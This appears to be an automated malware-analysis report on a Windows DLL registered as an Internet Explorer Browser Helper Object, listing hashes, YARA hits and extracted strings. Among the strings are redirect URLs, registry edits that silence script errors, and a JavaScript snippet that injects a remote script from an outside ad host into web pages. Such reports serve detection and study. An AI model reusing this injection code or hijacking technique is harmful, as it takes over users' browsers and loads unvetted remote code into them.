
Sample details: cc8a11fd436b61ecdf4835922a1ce78f

Hashes
MD5: cc8a11fd436b61ecdf4835922a1ce78f
SHA1: 26e28bd71afa63ff82339de54c56d9d38f084426
SHA256: 28ad5e823571350e7e0a1a6043c927bb18214878cb64dfaaf6529dd2c9e023a4
SSDEEP: 1536:ITeOGmHNEMLYIqT+apKlWQrSucwNRJE3LQWdqB9AUu9:YHGmRLRK2WQrS0NRJQLfdqB9AUG
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v1xx_v2xx_additional | YRP/Microsoft_Visual_Cpp_v70_DLL | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Microsoft_Visual_Cpp_60_DLL_Debug | YRP/Armadillo_v1xx_v2xx | YRP/Microsoft_Visual_Cpp_v60_DLL | YRP/Microsoft_Visual_Cpp_60 | YRP/Armadillov1xxv2xx | YRP/IsPE32 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/win_registry | YRP/win_files_operation | YRP/Str_Win32_Wininet_Library |
Parent Files
0385499f81590101f91f824de30b6b8d
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PSSh<E
PSSh4E
90u29p
t.;t$$t(
VC20XC00U
uRFGHt
YYF;5@
HHtpHHtl
^}%95\K
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
PPPPPPPP
PPPPPPPP
VWuBhH
HSVHWtgHHtF
+ttHHtd
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#SNAN
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
LoadLibraryA
GetModuleHandleA
GetProcAddress
GetCurrentProcessId
HeapFree
HeapAlloc
GetProcessHeap
MultiByteToWideChar
WideCharToMultiByte
lstrlenW
GetCurrentThreadId
InterlockedDecrement
GetLastError
SetLastError
GetModuleFileNameA
DisableThreadLibraryCalls
lstrcmpiA
InitializeCriticalSection
DeleteCriticalSection
LeaveCriticalSection
InterlockedIncrement
EnterCriticalSection
KERNEL32.DLL
DefWindowProcW
SetWindowLongW
CallWindowProcW
GetPropA
GetClassNameA
GetWindowThreadProcessId
SetPropA
GetWindowLongW
FindWindowExA
EnumWindows
USER32.dll
RegQueryValueExA
RegCloseKey
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
ATL.DLL
S2_32.dll
iphlpapi.dll
SHLWAPI.dll
WININET.dll
RtlUnwind
GetCommandLineA
GetVersion
CloseHandle
WriteFile
ExitProcess
TerminateProcess
GetCurrentProcess
HeapReAlloc
HeapSize
SetUnhandledExceptionFilter
TlsSetValue
TlsAlloc
TlsFree
TlsGetValue
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
FlushFileBuffers
SetFilePointer
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetStdHandle
GetStringTypeA
GetStringTypeW
IsBadCodePtr
LCMapStringA
LCMapStringW
GetCPInfo
GetACP
GetOEMCP
urlnav.DLL
DllCanUnloadNow
DllGetClassObject
DllRegisterServer
DllUnregisterServer
Version
SOFTWARE\Microsoft\Internet Explorer
DELETE
CONNECT
cid=0000_0001
zongyi.yisou.com
dongman.yisou.com
tv.yisou.com
dianying.yisou.com
v.tao123.com
v.yisou.com
xiu.jiabei.com/room/rand?webid=bmy_3
res://shdoclc/syntax.htm
www.paiji118.com
CabinetWClass
IEFrame
AfxWnd90s
Address Band Root
ComboBox
ComboBoxEx32
ReBarWindow32
WorkerW
http://
xiu.jiabei.com
http://xiu.jiabei.com/room/rand?webid=bmy_3
OldIEPorc
 (function(protocol){
											   if( 'https:'===protocol ) return;
											   window.onerror=function(){return true;};
											   if(document.getElementById('gngodom')) return true ;
											   if(window.gngo == undefined){ 
											   var gngo=window.gngo= document.createElement('script');
											   gngo.id = 'gngodom';
											   gngo.setAttribute('defer', 'defer') ;
											   gngo.type= 'text/javascript';
											   gngo.async= true;
											   gngo.src= 'http://ad.zzinfor.cn/static/sifu.js';
											   }
											   document.body.appendChild(window.gngo);
											})(document.location.protocol)
DELETE
CONNECT
v"djfrD
Mw.)/2
KH&l9*($m }N0da*v)7pn<x|[a1
"w=h1x*MR0`<9*.W*dkp}m>lzK;|7e
.ngQ7({x#8hm.W*)c=ag$u*~-bmGnJs0;!4&n^
\BIHJO
#np=wwOD
s	Yo&;{)i;?
TFz)kL=p<&m{e64]dk`%}-'/&1
d	Q`p*+l9*o%
	]\zLL
"|>b?X
l3y}N0e~)*hq$7Mi"d:al9*($
=w hko+1oF,0ejv}c=
LUL]S^cjw
F[	GXR
q(x5#)ueYFQ
u-mSv+3ko$"
d80l0#
/eX;|57y1LT_
9(&d-`<{F}<4$lvh2bY
*p>Ilbx65`
.4~-fh
Vt]i-ji0u)XRfq
QNLN	*
L}N0e{~r
q(>z151aw. esQu%6-j|2
T_.9&1oB
/taopid:
UrlNav
SOFTWARE\BMY
RegPath
ValueName
UncheckedValue
DefaultValue
CheckedValue
SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\
SCRIPT_ERROR_CACHE
3j*5g0z1a/m*{.t'#S[/d;lwip<0+>=_
explorer.exe
	Urlnav.Nav.1 = s 'Nav Class'
		CLSID = s '{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}'
	Urlnav.Nav = s 'Nav Class'
		CLSID = s '{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}'
	NoRemove CLSID
		ForceRemove {9A4DDA61-1D3A-49B7-9849-DAC6CD30A393} = s 'Nav Class'
			ProgID = s 'Urlnav.Nav.1'
			VersionIndependentProgID = s 'Urlnav.Nav'
			InprocServer32 = s '%MODULE%'
				val ThreadingModel = s 'Apartment'
	SOFTWARE
		Microsoft
			Windows
				CurrentVersion
					Explorer
					{
						'Browser Helper Objects'
						{
							{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}
						}
					}
stdole2.tlbWWW
URLNAVLibWWW
86ZINav
urlnav 1.0 Type LibraryWWW	
Nav ClassW
INav Interface
bKZQWW
1,171@1K1r1
2#2.2;2D2O2
8*8W8]8
;0;U;m;
<-<?<v<|<
=%=+=3=O=q=~=
>">7>K>&?D?U?z?
1,1E1N1Y1f1o1z1
272@2I2[2g2
3(3M3[3h3r3
5 505=5M5d5r5x5
5]6d6w6
8A8G8N8T8
:.:5:=:C:I:X:^:k:
;H;Z;a;
;;<C<K<
=@>F>L>Q>W>??g?
0*181A1F1
60676?6D6H6L6u6
6"7(7,70747
8M8T8X8\8`8d8h8l8p8
8X9p9w9
:b:h:l:p:t:
=(=1=[>i>o>s>x>~>
0R2Y2r2
5V5\5j5
6$6/656;6E6]6b6l6
6S7n7}7
9!979m:(;2<
60:0>0B0F0J0N0R0 1:1H1V1a1u1{1
2(222;2W2z2
6%6-626>6C6`6f6
859;9T9
<4<<<D<L<T<g<o<
>">(>5>E>K>S>q>w>
>$?<?B?N?S?
090T0d0
6+62696?6f6r6z6
7c9q9w9
:1:7:B:G:P:U:e:k:
:U;B=M=U=h=n=
2&2,2<2s2}2
2+313<3B3^3d3n3t3
:):1:7:=:~:
;I;d;l;r;x;
>6>@>a>v>
?7?\?k?z?
0)070D0I0O0
0>1!2:2o2w2
5#5,5t5
5#656;6K7P7
778=8K8
:5:@:K:P:l:
3-3J3b3
6)686Y6_6
7)737>7H7R7X7
7B8H8f8w8
9'959D9U9c9l9r9~9
9 :%:-:2:::?:d:i:
4$5*585
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2l2x2
283D3P3\3
0 0$0(0,0004080<0H0L0P0T0`0l0
1 1$1(1,1014181D1H1L1P1T1X1\1`1d1h1l1p1
6 6$6(6
6P9T9t;
;0<D<H<L<P<T<X<\<h<l<p<t<
<4?<?D?L?T?\?d?l?t?|?
3 3$3(3,3034383<3@3D3H3X3\3`3d3h3l3p3t3x3|3